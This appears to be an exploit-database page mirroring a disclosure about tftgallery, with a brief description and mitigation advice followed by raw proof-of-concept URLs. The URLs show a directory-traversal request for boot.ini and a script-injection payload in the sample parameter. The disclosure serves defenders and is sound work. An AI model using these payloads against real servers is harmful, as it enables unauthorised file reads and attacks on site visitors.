header-logo
Suggest Exploit
vendor:
tftgallery
by:
Blake
8.8
CVSS
HIGH
Cross-Site Scripting (XSS) and Directory Transversal
79, 22
CWE
Product Name: tftgallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Album Parameter Vulnerability

The album parameter in the tftgallery application is vulnerable to Cross-Site Scripting (XSS) and Directory Transversal attacks. An attacker can inject malicious JavaScript code into the album parameter, which will be executed in the user's browser. An attacker can also use the album parameter to traverse the directory structure of the application, potentially gaining access to sensitive files.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the album parameter. Access to sensitive files should be restricted and access control lists should be used to limit access to only authorized users.
Source

Exploit-DB raw data:

Released information about the album parameter being vulnerable to XSS
earlier. Seems there are other similar issues:

The album parameter is vulnerable to directory transversal

http://example.com/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1<http://192.168.1.130/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1>

The sample parameter is vulnerable to XSS

http://example.com/tftgallery/settings.php?sample='></link><script>alert('blake
XSS test')</script>&name=cucumber%20cool
<http://192.168.1.130/tftgallery/settings.php?sample=>

Navigation

Suggest Exploit

Services By CQR